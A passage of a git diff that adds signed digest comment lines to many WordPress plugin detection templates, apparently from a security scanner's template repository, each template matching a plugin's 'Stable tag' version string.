490a00463044022016eac136d6668d3163f87f336f59d8f0abd3e2bc95e8603fcd61eb0d2c531e6702204e4f6521787d2cda15efce20d3a4cc672a38fd6b02d4b815cc1a843f509cb4d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 41f7a0075e..0d98bf8aa8 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022040835db46b4718099f1d54c4e15af58e151c10dbc43c30ab2fca86b90881e08c02210088f7175496bba8fccc98978dcbbca1c4da0cd317c88b396d59745948758a86c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 7e35a3fb4f..15145a3da1 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008088be9cbc1142c2135c3a446b35c10d4582238e7729f3322abb340b3f9a35c40221008a7edb7efb9f4b3f6212b67a3e17a940e39551257f5322ff73ce94552494c568:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index 18c2a7586e..601b1d47b6 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b88a40345f97635c6433567010ad32b2f76cd277da0b83da14c40827aa0ad91b022100a525554e6327b4af677bcb0c7d7834283be93b20fabc1d2ef21f458712a1253b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 6bc2aa78f9..1f4634b435 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100db32f645636d2cf98be7c6b179634affafc3f914f3a01936e82c6f3ca703b09c0220111ffe8f6ca36749c29a19df3949809c90f5a2e8e910d8a9ded456964dc84280:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index a43d3352a2..549d4fa468 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009881e7477a61cb1a7acf2f0885e8162de546828b454a98a0855335c34a2fd4ad022100c557ff9c63fc6957da5c1799d67650efba63d4a40462897fb082fe9895f72077:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index e7db9944e4..24ecd35304 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022008ec6bf700ca6dc4efa36cf261e50e19c989d5059aaa146d6fa1a0e656d22951022100df5056592f8b4950fc6fb7ff90ad5d6b10885680ee89cb98e55694605579f43a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 268bd7b9df..f95395b94e 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022071d61a270e98fdffae30b1fa918b02e25d252e45301c1df4c9e2b30b0cc8296b022100acd89b4a24a1672c1f9c4bdf0c6e5c239274eda23cf046a0844ebcef63450461:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index d7fb2209d1..a8738905df 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a8ac7b55e9dd826391a86536728ec53e78991e26af7b6dc02cc95cfc3655f5e3022046c4d8126eb6b92195dac82faef944301bddc6101b54cbabd396e703b5cb84e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index a1641d4632..473505e24f 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100dc8537b779035b9e6a2c7e88621dbfea4c8d9f8dfe2790251d373baf1584a30b022054913de97ba56b6ecce471ba279e608d1b91987e401beb44be6f16ae9b4ab4be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 3b6542683c..f051f19e00 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200c8373358b1b14b905d4a90ea7e37b4c6c1749af229c31bdc7ca711c0c08630f022100c6d55abb85af62b52670823994f3799b82276a56ba46dee3fb6e3e87b929f6d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 969c280ee1..f0ee56e8fe 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022003391693d3bf4cfa76091bdd0bf9760e5866ef562f2fec092ff7aa2b1d5ab381022071ee41ad7573af479ab2ca2231983da898e9dd6adab4c61ad1bc544f8113993d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 1c97c422e4..d0e54a20ee 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100978e9f816ec1b37ed6e1966ded892abb6e881c8ce09b853dc3cae16d2f4546ba022041e529dc26a62fc0c44a693be8d5621fd17e42fea19e536137bc380c72d72300:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 7d861cf06a..da3114a6ba 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220327b372b71d6daa5332db041d2100be1e6d59336b1962debea59f23852b6319e02204081f11e253e7bf78b339da176fc52dca83a7c8cc0045b577b3787f9a3660a48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 00eb1e2dfc..cc2236a813 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a2f8764eb7d1eb45c12d7080c1652ccb203352ddad8bbbe73a6ae79d892ede33022100cebd582e299841854e8e1a1e7baae9e1c00cd7713d760d41d9138ff9fd122aa8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index f089ee37d3..bae93bcedd 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200fcaa64b5b9b388aa879eb6a6613c4bfd7a57597e4f22ab9114a594bee8ae79e022072e1c2566e9d0666df425a6b4e268003b51b9c4ac681e78117c8bd689a3f8877:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 492d66db68..13c7e9417c 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022040cc56aa0cb735bb768305a6ee5d0c4978a84b7a164f783e628cd96f30d4e50b022100b8be83b11af5ec4e67e198347a1e3edbf3c218bc4dbd3d2afb2838d7f3d6abe4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index f8903fa3db..7634ef2734 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205002a2faea096b5079be8eed97cccd250e75f818b32b547babe9fde6865578e9022100c877489d85d815854aaae2a1a3375c80e153da5565b29c6347640c654d42b425:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index ae2451ca38..076ce516bc 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202baee1d744fee7004df520e8f15a4cf1d1b63462152e6333c563d4523b0007b202204034b2a3161cebc4e8a32f1e2dba7b6f0df92addac3edb5ef985dc73e507a971:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index dcc61d1255..8d6bdd3bf3 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220053bede0b07e9fd5e7df95f1933c26fad6341a076a6690a8954981faf5856aca022100e37260fba3606804514d8e027f3134296a14ada021b5bef9836b50548a2b972b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index d1d2c1c1d0..9d3165f34c 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202593d83815bf06e7dbac2396e34c1d1ac18950447a77b40192effc88f0454c30022100ff22a694f0462fd1325000590d94c985a15701824bc3a228577ac44990cf2c8b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 5f5e8afed5..605fde4869 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100df222fa7c1abbe23e1f1b9ce2b01e59dd346efc71acba08cd36b2d6b62a6ac33022100ae8c162cf78742314ca7238cb6012d930b171813490684190ee5bed69679fa62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index d15634bb2b..e2375bb982 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200c717f6e2de3caa1c148f9643f5188403bf95d287218cc16bf4862f3997cba80022100d1a46a00590a8eb685f52f204830b2ecfca75ae312acacb68e8fb41d7a0e1d7e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 7da04be5d3..e1c631ed8f 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204a9045c9cd968eb2d9e33777247be8927fb6e4ef883434cdd43ce3dcd0781c670220608b9f9c5a663b1a733638ba36af63135827d9a7053cbac9d3ace6ce0a95676c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index a79253cec5..a8aee36003 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206ded9ffdd4278ad43fef08163cf18a4c657ab5607d222d97c2d5986927523fa602210087c86b13b13a7fb9f4d22a6e8916780fbf07f1a1df4e5066bd45d5d42e910e76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 77fc04a220..5175ba1bde 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fa117ad9b566cfe19469d87750bb516b889693636e936fc3cfd4f05f5cb301e2022043857e25a499547ed1c2d5d3e49519ec9af6bbaa7f84c38c3dfd41fe7648a6ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 733f9ee453..f0824e3471 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ca0d1d4b1ba9c2f9334f41eb61a514e2c03c614101b71c0dc4f43d5bbf73e2f5022100c9f558097c4114f7f1ed8811b43982065620c971311232518ff0bf17aab2c126:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index 0af08f0ac0..2fa7a09165 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022069eb8797e0028e8e7d506be4e902fea9b0a39195ba0f199a80b905acb449c62502210090c8f34da7b7e978cf6c49f494c1c8a2e3ae08ace501a5b81b9732680c37d08b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index 1e4c77fbca..02443ac4c7 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022024d42d0c7c2201e636887069eaf9b54b428202e920f2e943a6099c9f39960dd4022011c64ff18c1faad70bd91a63454ce4c205b064f783de391d58c6a9b24093344b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 295e3fe82d..8be4ed4e3e 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f545f8ba74a4aff00df24a2bc7f117bcf5d2106c27c1795f57181f114de2b76402202a0ac7d4057b7ddd45d2cb3ff4598c9bbd18e7a97b378bf8eb13d8968d9c2cba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 862f73201f..5fa041d70f 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200d9c6b075bfd7bf8699f50f56a76015b3dbead72a01f2c6f39c961b034a87626022100db556de5d5e1e787a0401448cd7050b573003b45ed943c360118649fc224fd94:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 711b64f9d0..f79142d0ff 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b3da8dbf2455c34d01214bb5727a5814f72d75c14232131822d3fe40dec42ec6022100f1109782dbcc64e33f77b8154ed97474672976b7dad629e2ef6f5b986150e247:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 58ddcfab78..957e747775 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205d439a299151a804e3247d4d168c8020e6a5d7a486d11e0948b32a88dba04b4a02206f1966a8647e14aa8b71508663663e6a5baabbef8aab16699d9d6380acdc75c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 305d74e8ea..aa9d54a825 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220641c7dbb0a63e65cb81e2a6465a2a30306d6bedd0172f0dd505ef710921037ac022100ef9de39caa55d47f9a472337684f727d5cd66aedda684823a139444aa148dd85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 668162fc4e..78bc313248 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022020714a55dd7aaee13d7cdcbe680fa4a90d2ddd927a07d0e68ee556f185c794dd022100c95f34417f92f7209f8c7769d9d7dd2eb0f979395337a6b5d52d8c129db56ba1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 2a233f389d..94693dc13b 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d65b8c9592ccbe768f66b949219690387829b7a5726ace60858c55331f8b2cdb022066b95ac66ce46058697ff53ed0432913eb4e87077beab01b4fcf2d3e3d464419:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index a0d2554492..1555ac0ac5 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100eb374a9a85bd15bf1003a9666a87987778278bf85c50de0b35513115e62b355f02206020c9e5b3fad39ed95a89410c75ca8b8e78278552f19c3f09d4dd5eb900d8e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 4e5046273d..a89fb007b6 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c46b16c3a19aee6ebd7a71c6115fababdefce1963542f7611cb836e0b9615f0c022019855483c52fc51207a7cdeb1a7fa8f2aa95a404a97d0814fc4e114167cf876b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index f44cee7980..504ee1922a 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c0ada293c8dfccc9511966b22302422836ca1d0d982b0f6eecd283927c96f94a0221008f3d5b784c0f36eaef2e23c0f97453726034129dccb38ba604d282137e559ddc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 39130db767..b2bc394033 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203c8789102d3799216727626ef6c0eae3c1734a037fd521e5050f5452f2900fad022100d99009f5c4994c67b25c158c4630199dd2e628693efaa9366a697522149ed1e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 39c497073c..1d082d0a67 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022059c3771b75c417bf7df845878739b8dda04c8032516bfba1bb83bb5dd4da036c022033a4b9ddaa6493a57520b3b3753b7ba5c8dd823562123893d3c1d3911c28593d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index b848288b55..de99a1599b 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a5c0d064644d48ca8fcad173d8bf4af6b6da4a0c031bb120e640c7ee8b2aa91b0220597fa8f878b7ba9db2bc62676ec72cae4cbe0124318375db2fd24987ca9c26d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 4d10178692..8caa3f56f2 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c3b45bf26459c97daeaea601fab989523092eb5e0e5b46fcadacb88a7686612d02207f0eae19d50f5b7d0b50540c01ffc8a29d32963da174415082b0b6506ccc4ba5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 7aac0a153f..600f2c63c6 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a2a32fb326f4441c4ab16f5a53d172fe8002335e8452d8481ac88088238d05310220330b75afb7cc79ccd504b9a727532123d30473da0ab992b55465fc3cc6763058:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index d0cebd5316..4d23ace4f4 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f93ed9c0441a194d16311d3e11f4e5863019ef1e7cfb8a91d5b0b95fabfa31d1022100f3701b9e0a12c0c6424646042d2503991024c71b58817b10315a5dcac737c901:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index ff20779157..8f00e315f8 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203698ea9cca658497546f7312eb5628465650c6aab7ac9754f97eb31573c2e0410221009c3db0b5433d5506cc9e118c87529086ded3fc804f569ddab6a4ee0ea4f5a5a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index fffdc7d017..0b750593aa 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f793ca539e88e9e914ecf4f71110d8fc43c0647eca1d72ee098f8bb5e153e6b502206757df360d74cc2d0225bb2de284464ff4b830a30d4639c806ad6ae9e386e113:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 7a9746a70d..99bdca94ad 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d4c20b5e9cabf4ce0ea4ad5f286d0c0b34dac655670076c1afa2ef1108378f0d022100fe1c311d29449840f51dabcfc542fc08e1a1be58c1171412e608cd5debe2f57d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml 